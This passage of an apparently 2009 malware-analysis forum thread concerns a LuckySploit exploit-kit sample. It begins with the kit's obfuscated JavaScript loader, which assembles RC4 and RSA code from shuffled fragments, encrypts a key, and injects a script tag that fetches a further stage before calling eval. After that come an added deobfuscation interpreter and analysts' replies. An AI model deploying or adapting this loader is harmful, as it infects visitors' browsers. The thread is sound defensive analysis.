i,j,t;for(i=';T='0;i<256;++i)this.S[i]=i;j';V=';A.prototype.TXN=LTQ;A.ZNP=';B='VN(){this.i=0;this.j=0;thi';S='s.i+1)&255;this.j=(this.j+this';A+=N+Z+U+V+J+B+Y+G+T+C+F+Q+X+D+W+S+H;T=';function DSB(x){VPQ[CKC++]^=x';W='r JGC;var VPQ;var CKC';K='urn new HVN()}var TMF=256;va';F='24)&255;if(CKC>=TMF)CKC-=T';J='&255;VPQ[CKC++]^=(x>>8)&25';S='null){VPQ=new Array();CKC=0;';R='his.i])&255]}HVN.prototype.';V='.i];this.S[this.i]=th';C='new Date().getTime())}if(VPQ==';Q='=t;return this.S[(t+this.S[t';B='MF}function ZCJ(){DSB(';M='t=VTL;function PXP(){ret';H='255;VPQ[CKC++]^=(x>>';U='5;VPQ[CKC++]^=(x>>16)&';L='is.S[this.j];this.S[this.j]';P='init=KLR;HVN.prototype.nex';D='var t;if(navigator.appNa';A+=V+L+Q+R+P+M+K+W+T+J+U+H+F+B+C+S+D;E='CKC]=0;CKC=0}return JGC.next()';Z='MF){t=Math.floor(65536';N='i=0;i<a.length;++i)a';J='>>>8;VPQ[CKC++]=t&255}CK';F='P();JGC.init(VPQ);for(CK';V='C=0;CKC<VPQ.length;++CKC)VPQ[';T='harCodeAt(t)&255}while(CKC<T';L='C=0;ZCJ()}function DLX(){';Y='th;++t)VPQ[CKC++]=z.c';W='.crypto){var z=window.cryp';B='to.random(32);for(t=0;t<z.leng';X='me=="Netscape"&&navigator.a';G='[i]=DLX()}function GKG(){}GKG.';U='}function DLXs(a){var i;for(';S='if(JGC==null){ZCJ();JGC=PX';M='ppVersion<"5"&&window';C='*Math.random());VPQ[CKC++]=t';A+=X+M+W+B+Y+T+Z+C+J+L+S+F+V+E+U+N+G;M='n XNG(b){if(b<0x10)retu';T='\\n";i+=n}return a+s.sub';I='r a="";var i=0;while(i+n<s.len';S='a,r)}function KEV(s,n){va';L='gth){a+=s.substring(i,i+n)+"';V='string(i,s.length)}functio';H='arCodeAt(i--);a[--n]=0;var ';U='i>=0&&n>0)a[--n]=s.ch';P='y();while(n>2){x[0]=0;while(x';F=',n){if(n<s.length+11)';K='rn"0"+b.CPD(16);else ret';R='b=new GKG();var x=new Arra';E='y();var i=s.length-1;while(';G='n CWB(a,r){return new A(';O='prototype.KPG=DLXs;functio';W='urn b.CPD(16)}function OJZ(s';Q='{return null}var a=new Arra';A+=O+G+S+I+L+T+V+M+K+W+F+Q+E+U+H+R+P;K='nction PBR(a){if(oil';X='>1){oil=HDV(CCJ,53);a=ci};var 
';V='his.n=null;this.e=0;this.d=nul';N='=null;this.WIY=null;this.VQZ=n';R='ull;this.ICV=null}funct';T='eturn x.TXN(this.e,this.n)}fu';B='16);this.e=parseInt(E';M=';if(m==null)return n';F='(a)}function RSAKey(){t';J='ion YYX(N,E){if(N!=nu';S='l;this.p=null;this.q';O='[--n]=2;a[--n]=0;return new A';C='m=OJZ(a,(this.n.YPP()+7)>>3)';Y='ength>0){this.n=CWB(N,';E=',16)}}function OCQ(x){r';D='ll&&E!=null&&N.length>0&&E.l';Z='[0]==0)b.KPG(x);a[--n]=x[0]}a';A+=Z+O+F+V+S+N+R+J+D+Y+B+E+T+K+X+C+M;U='2cacfb3a8f1d087496d10558efed7';H='ototype.setPublic=YY';W='oPublic=OCQ;RSAKey.pr';Y='+h}RSAKey.prototype.d';O='1));rsa=new RSAKey();';X='m);if(c==null)return nul';B='5acb5c6f8b7e6ac28914920';P='aab3d171741f361fb7da65321c13';F=';oil<53;oil++)sss+=String';C='X;RSAKey.prototype.encr';I='&1)==0)return h;else return"0"';V='ull;var c=this.doPublic(';T='ypt=PBR;sss="";for(oil=0';K='rsa.setPublic("ad178d4455';Z='or(75+Math.sin(oil)*2';L='.fromCharCode(Math.flo';E='l;var h=c.CPD(16);if((h.length';A+=V+X+E+I+Y+W+H+C+T+F+L+Z+O+K+U+B+P;V='var scriptTag=documen';K='7f050c710ec267da07d079c92466';Z='scriptTag.src="?"+res;d';J='ocument.body.appendChi';U='7fd5fc4d41","10001");res=r';G='t.createElement("script");';B='ld(scriptTag);';I='sa.encrypt(sss);nextkey=res;';A+=K+U+I+V+G+Z+J+B;eval(A);</script></html>
Analysis :
Code:
http://wepawet.iseclab.org/view.php?hash=53e2d900bba11fc1f78c011fbb8413f6&t=1232989747&type=js
Quote
try {
  f = 'Welcome to LuckySploit:) \n ITS TOASTED';
}
catch (e){
}
Ruining the bad guy's day
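The sample SysAdMini posted uses a different trick from the earlier ones: the real program is cut into short string fragments assigned to one- or two-letter variables, the fragments are appended to `A` in a shuffled order (`A+=U+V+Z+...`), the variable names are reused for the next round, and finally `eval(A)` runs the result. Because the script only ever does those three things (`NAME='literal'`, `NAME+=N1+N2+...`, `eval(NAME)`), the payload can be rebuilt by replaying the assignments with a tiny interpreter, without handing anything to a JavaScript engine. The code below is an added example, not from the post and not Malzilla's implementation; its function names and the short constructed sample are ours. A plain split on `;` does not work here because the fragments themselves contain semicolons and quotes, which is why the example scans string literals properly.

```javascript
// Added example (not from the forum post, not Malzilla code): a minimal
// interpreter for the fragment-shuffling obfuscator. It supports only
//   NAME='literal';   NAME+=N1+N2+...;   eval(NAME);
// and refuses anything else, so no script code can ever be executed.

// Scan a single- or double-quoted JS string literal starting at src[i].
// Returns [value, indexAfterClosingQuote]. Handles \\ \' \" \n \r \t escapes.
function scanStringLiteral(src, i) {
  const quote = src[i];
  const esc = { n: '\n', r: '\r', t: '\t' };
  let out = '';
  i++;
  while (i < src.length && src[i] !== quote) {
    if (src[i] === '\\') {
      const next = src[i + 1];
      out += esc[next] !== undefined ? esc[next] : next;
      i += 2;
    } else {
      out += src[i++];
    }
  }
  if (i >= src.length) throw new Error('unterminated string literal');
  return [out, i + 1];
}

// Replay the assignments and report what would have reached eval().
function reassembleFragments(src) {
  const env = Object.create(null);
  const stmtRe = /([A-Za-z_$][\w$]*)\s*(\+?=)\s*/y;   // sticky: must match at lastIndex
  let evalTarget = null;
  let i = 0;
  while (i < src.length) {
    while (i < src.length && /[\s;]/.test(src[i])) i++;   // statement separators
    if (i >= src.length) break;
    const ev = /^eval\(\s*([A-Za-z_$][\w$]*)\s*\)/.exec(src.slice(i));
    if (ev) { evalTarget = ev[1]; i += ev[0].length; continue; }
    stmtRe.lastIndex = i;
    const m = stmtRe.exec(src);
    if (!m) throw new Error('unsupported syntax at offset ' + i);
    i = stmtRe.lastIndex;
    const name = m[1], op = m[2];
    let value = '';
    for (;;) {                                              // RHS: terms joined by '+'
      if (src[i] === "'" || src[i] === '"') {
        const [s, next] = scanStringLiteral(src, i);
        value += s; i = next;
      } else {
        const id = /^[A-Za-z_$][\w$]*/.exec(src.slice(i));
        if (!id) throw new Error('expected string or identifier at offset ' + i);
        if (!(id[0] in env)) throw new Error('use of unassigned variable ' + id[0]);
        value += env[id[0]]; i += id[0].length;
      }
      while (src[i] === ' ') i++;
      if (src[i] !== '+') break;
      i++;
      while (src[i] === ' ') i++;
    }
    env[name] = op === '+=' ? (env[name] || '') + value : value;
  }
  return { evalTarget, payload: evalTarget === null ? null : env[evalTarget], env };
}

// Constructed sample in the same style as the posted script (ours, not the
// real payload): fragments contain quotes and semicolons, names are reused.
const SAMPLE_SCRIPT =
  "A='';Q='var g';K='reet';Z='ing=\"h';A+=Q+K+Z;Q='i\";';K='x=1';A+=Q+K;eval(A);";

const result = reassembleFragments(SAMPLE_SCRIPT);
console.log(result.evalTarget);  // A
console.log(result.payload);     // var greeting="hi";x=1
```

For a real sample, pass only the script body (the text between the `<script>` tags) and read the returned `payload`; if the interpreter throws on an unsupported construct, that itself is a signal that the obfuscator has changed and the script needs a closer look rather than a bigger interpreter.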

January 26, 2009, 07:00:14 pm
Reply #22

bobby

Yup, that's what you get if you do not have the cookie.

January 26, 2009, 09:16:11 pm
Reply #23

SysAdMini

Quote
Yup, that's what you get if you do not have the cookie.

Are you sure? This sample looks completely different from the older one and I haven't found any cookie.   ???
Have you tried to decode it? Successfully?

/EDIT

I can send you a pcap file.
Ruining the bad guy's day

January 27, 2009, 06:52:08 pm
Reply #24

bobby

I can't do any testing till the weekend.

Btw, beginning 13 February, I'll be on vacation for 3 weeks.
I'll have some time to update Malzilla to deal automatically with this kind of script (HTML objects + JS).

February 04, 2009, 08:34:18 pm
Reply #25

SysAdMini

Ruining the bad guy's day

February 06, 2009, 11:46:35 am
Reply #26

SysAdMini

Ruining the bad guy's day